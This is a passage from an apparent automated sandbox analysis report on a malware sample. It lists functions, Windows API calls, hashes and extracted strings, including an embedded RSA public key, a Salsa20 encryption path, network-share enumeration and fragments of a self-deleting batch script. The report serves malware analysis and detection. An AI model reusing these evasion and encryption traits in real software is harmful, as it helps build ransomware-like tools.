                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 657562460-0
                                                                                                                            • Opcode ID: de2def72106617bd751837f4368c798c607475e2aba36bab134435c0d11de50f
                                                                                                                            • Instruction ID: d35ec99b10942a5e784a732dd5713af3144c4dc4f3d765172cccd57d252ada6f
                                                                                                                            • Opcode Fuzzy Hash: de2def72106617bd751837f4368c798c607475e2aba36bab134435c0d11de50f
                                                                                                                            • Instruction Fuzzy Hash: F6E04F757402049FDB09EE52C491ABB77999BA2740B14C02EAC0E8B751EA34D90597A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047FA10 Relevance: 1.5, APIs: 1, Instructions: 19threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 0047FA25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: 50ecc299663bfc87034d43f58044653a349b54764fb82ba000eb5eed4c4f62dd
                                                                                                                            • Instruction ID: 7d113731490eb377dadbafc289334a5a37860496457a5123ff53a6b9a0928e1e
                                                                                                                            • Opcode Fuzzy Hash: 50ecc299663bfc87034d43f58044653a349b54764fb82ba000eb5eed4c4f62dd
                                                                                                                            • Instruction Fuzzy Hash: DFD05E322483147BE3240A99AC07F867AC8CF15B10F40802AB609DA1C0D5A1A8109698
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047FD80 Relevance: 1.5, APIs: 1, Instructions: 18windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00470BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00470C12
                                                                                                                            • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0047FDA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumMessageOpenSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1835186980-0
                                                                                                                            • Opcode ID: 5165047aa52b6431cf995dbff9ed3fbaaac3058e48b7ded47a98193e1dc3e35c
                                                                                                                            • Instruction ID: 8fb55207affafd81f379fa1fb868a18429266d1811a0a282662ba154afa5c6bb
                                                                                                                            • Opcode Fuzzy Hash: 5165047aa52b6431cf995dbff9ed3fbaaac3058e48b7ded47a98193e1dc3e35c
                                                                                                                            • Instruction Fuzzy Hash: 1FE01231145744AAD72197A5DC05B86BBD49F29724F00C81EE69AAB981C5A1B00896A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047FDC0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00589230), ref: 0047FDD6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: e2a35ef3c307a2c1796c841000d70cd0b66a832eaa07bdb067f984f0af64a2d3
                                                                                                                            • Instruction ID: c46b30a9cf69165d5a5d98d9a1242e4d0fb8873b8a882001747d598d1f0728ce
                                                                                                                            • Opcode Fuzzy Hash: e2a35ef3c307a2c1796c841000d70cd0b66a832eaa07bdb067f984f0af64a2d3
                                                                                                                            • Instruction Fuzzy Hash: ACD0A93138830537E3100BA4AC03F593A889B28B00F404026BA0AE80E0DAA1A024AA1C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004820B6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __fsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3646066109-0
                                                                                                                            • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                            • Instruction ID: 98e4cb081be4c3c2b639beb8b7224fbf837d07da3fd8144b75e897653238e8c5
                                                                                                                            • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                            • Instruction Fuzzy Hash: 64B0927244020C77CF012E82EC02A493B1D9B50764F048022FF0C18171EABBE6659789
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00487F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _doexit.LIBCMT ref: 00487F47
                                                                                                                              • Part of subcall function 00487E0E: __lock.LIBCMT ref: 00487E1C
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(00567B08,0000001C,00487CFB,00000000,00000001,00000000,?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487E5B
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487E6C
                                                                                                                              • Part of subcall function 00487E0E: EncodePointer.KERNEL32(00000000,?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487E85
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(-00000004,?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487E95
                                                                                                                              • Part of subcall function 00487E0E: EncodePointer.KERNEL32(00000000,?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487E9B
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487EB1
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487EBC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2158581194-0
                                                                                                                            • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                            • Instruction ID: cd31fe6ccee1c9104b14018fc3f0cb71c832b62b837260db633732b656dada53
                                                                                                                            • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                            • Instruction Fuzzy Hash: B8B0927198420832DA113642AC03B193A085740A54F200061BA0C185A1A592A96041C9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00480FDD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __wfsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 197181222-0
                                                                                                                            • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                            • Instruction ID: ee55c5931efa4d6eb966c951fa53b3a32acd3fbe15ea03dccac393aa7087a806
                                                                                                                            • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                            • Instruction Fuzzy Hash: E5B0927244020C77CE012A86EC02A493B1D9B426A8F008022FB0C18572A677A6A19A89
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 004982A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcscmp.LIBCMT ref: 004982B9
                                                                                                                            • _wcscmp.LIBCMT ref: 004982CA
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00498568,?,00000000), ref: 004982E6
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00498568,?,00000000), ref: 00498310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale_wcscmp
                                                                                                                            • String ID: ACP$OCP
                                                                                                                            • API String ID: 1351282208-711371036
                                                                                                                            • Opcode ID: 1565af8796d8fca58075b66a2e283cf308e596930ccb6ba70c0922ab1c2193a5
                                                                                                                            • Instruction ID: f09221e07787fd6ed1a268f831bd9814c4459e4777eefef0877f2679f2b83973
                                                                                                                            • Opcode Fuzzy Hash: 1565af8796d8fca58075b66a2e283cf308e596930ccb6ba70c0922ab1c2193a5
                                                                                                                            • Instruction Fuzzy Hash: 2C01AD32240515AADF209F5CDC45F9A3F98AF06BA4F10807AF904DA152EF34DA41C7CC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00479E70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P, xrefs: 00479EC4
                                                                                                                            • p2W, xrefs: 00479EE2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P$p2W
                                                                                                                            • API String ID: 2102423945-374934728
                                                                                                                            • Opcode ID: 5c52a12be00c7d1fb8d5c872556807fba956def5a037192d4b27ffbb129be8c9
                                                                                                                            • Instruction ID: 816fc5adc046c836e003117ccb53362a93c6c62e7184d3277b519f31c51fdba7
                                                                                                                            • Opcode Fuzzy Hash: 5c52a12be00c7d1fb8d5c872556807fba956def5a037192d4b27ffbb129be8c9
                                                                                                                            • Instruction Fuzzy Hash: 4DF0393828874069F3106790BC0BB297E81A334F18F044048E60C2A2F3D7ED228CB3DE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0046C090
                                                                                                                            • input != nullptr && output != nullptr, xrefs: 0046C095
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __wassert
                                                                                                                            • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                            • API String ID: 3993402318-1975116136
                                                                                                                            • Opcode ID: 679917d25044a767dc263e370465a4748786f75e15b486e877805c7e02c15bab
                                                                                                                            • Instruction ID: a55f87971629810a1491c9fb319ad9f1b3725c102d4007a170b48d151e7ca282
                                                                                                                            • Opcode Fuzzy Hash: 679917d25044a767dc263e370465a4748786f75e15b486e877805c7e02c15bab
                                                                                                                            • Instruction Fuzzy Hash: 4DC19DB5E002499FCB54CFA9C881AEEBBF0FF48300F24856AD859E7301E334AA458B55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004724E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004724FE
                                                                                                                            • GetLastError.KERNEL32 ref: 00472509
                                                                                                                            • CloseHandle.KERNEL32 ref: 0047251C
                                                                                                                            • CloseHandle.KERNEL32 ref: 00472539
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00472550
                                                                                                                            • GetLastError.KERNEL32 ref: 0047255B
                                                                                                                            • CloseHandle.KERNEL32 ref: 0047256E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                            • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                            • API String ID: 2372642624-488272950
                                                                                                                            • Opcode ID: 1aa57994b312c62297bcd2240da27eced8110425f2e63f3d54dbe38460a2f4a0
                                                                                                                            • Instruction ID: 5f88596263c58d6bad05855d18bb1be5ee0e1cb815ecbd1d66e99a0c13f0a4f3
                                                                                                                            • Opcode Fuzzy Hash: 1aa57994b312c62297bcd2240da27eced8110425f2e63f3d54dbe38460a2f4a0
                                                                                                                            • Instruction Fuzzy Hash: 36717D72900218AADF209BA0EC89FEE7BACFF55311F004596F609D2191DF759A8DDF60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 00471915
                                                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00471932
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471941
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471948
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00471956
                                                                                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00471962
                                                                                                                            • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00471974
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 0047198B
                                                                                                                            • lstrcatW.KERNEL32(00000000,00560260), ref: 00471993
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 00471999
                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004719A3
                                                                                                                            • _memset.LIBCMT ref: 004719B8
                                                                                                                            • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004719DC
                                                                                                                              • Part of subcall function 00472BA0: lstrlenW.KERNEL32(?), ref: 00472BC9
                                                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471A01
                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00471A04
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
